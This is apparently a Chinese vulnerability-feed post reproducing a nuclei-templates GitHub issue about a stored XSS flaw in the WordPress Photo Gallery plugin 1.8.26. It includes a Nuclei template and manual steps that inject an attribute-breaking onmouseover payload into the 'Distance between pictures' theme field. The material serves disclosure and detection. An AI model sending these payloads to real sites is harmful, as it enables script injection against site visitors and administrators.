WordPress Photo Gallery Plugin Stored XSS Vulnerability

漏洞信息

漏洞名称: WordPress Photo Gallery Plugin Stored XSS Vulnerability

漏洞类型: 跨站可执行脚本

漏洞等级: 高危

漏洞描述: WordPress Photo Gallery插件是一款流行的WordPress插件,用于创建和管理网站上的照片库。它广泛应用于个人博客、企业网站等多种场景,用户可以通过它轻松地上传、编辑和展示图片。该插件因其易用性和功能丰富而受到许多WordPress用户的青睐。该插件在1.8.26版本中存在一个存储型跨站脚本(XSS)漏洞,攻击者可以通过在“Distance between pictures”字段中注入恶意脚本来利用此漏洞。当管理员或其他用户查看受影响的页面时,注入的脚本将在其浏览器中执行。这种漏洞的根本原因在于插件未能对用户输入进行充分的过滤和转义,导致恶意脚本被存储并在后续页面加载时执行。此漏洞可以被利用来窃取用户的会话cookie、重定向用户到恶意网站或在用户的浏览器中执行其他恶意操作,从而对网站及其用户构成严重威胁。攻击者需要具有编辑主题的权限才能利用此漏洞,这意味着它主要影响具有管理员权限的用户。然而,一旦被利用,其影响范围可以扩展到所有访问受影响页面的用户。

产品厂商: 10web

产品名称: WordPress Photo Gallery Plugin

影响版本: 1.8.26

来源: https://github.com/projectdiscovery/nuclei-templates/issues/12712

类型: projectdiscovery/nuclei-templates:github issues

来源概述

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
id: wordpress-photo-gallery-xss

info:
  name: WordPress Photo Gallery Plugin Stored XSS
  author: 0xr2r
  severity: high
  description: |
    Detects stored XSS vulnerability in WordPress Photo Gallery plugin version 1.8.26. The payload is injected in the "Distance between pictures" field and executes when the page is loaded.
  tags: wordpress,xss,stored,plugin
  reference:
    - https://10web.io/plugins/wordpress-photo-gallery/

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        distance_between_pictures="onmouseover=\"alert(1)\"style=\"position:absolute;width:100%;height:100%;top:0;left:0;\"qq9r3"

    extractors:
      - type: regex
        name: csrf_token
        part: body
        regex:
          - '<input\s+type="hidden"\s+name="_wpnonce"\s+value="([a-zA-Z0-9]+)"' # Extract CSRF token
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "onmouseover=\"alert(1)\""
      - type: word
        part: header
        words:
          - "text/html"

Relevant dumped responses

1
2
3
4
5
6
#### Steps to Execute the Payload:

1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 
2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed

Anything else?

No response

Github Poc
#projectdiscovery/nuclei-templates:github issues #跨站可执行脚本
WordPress Photo Gallery Plugin Stored XSS Vulnerability
http://example.com/2025/07/25/github_866851028/
作者
lianccc
发布于
2025年7月25日
许可协议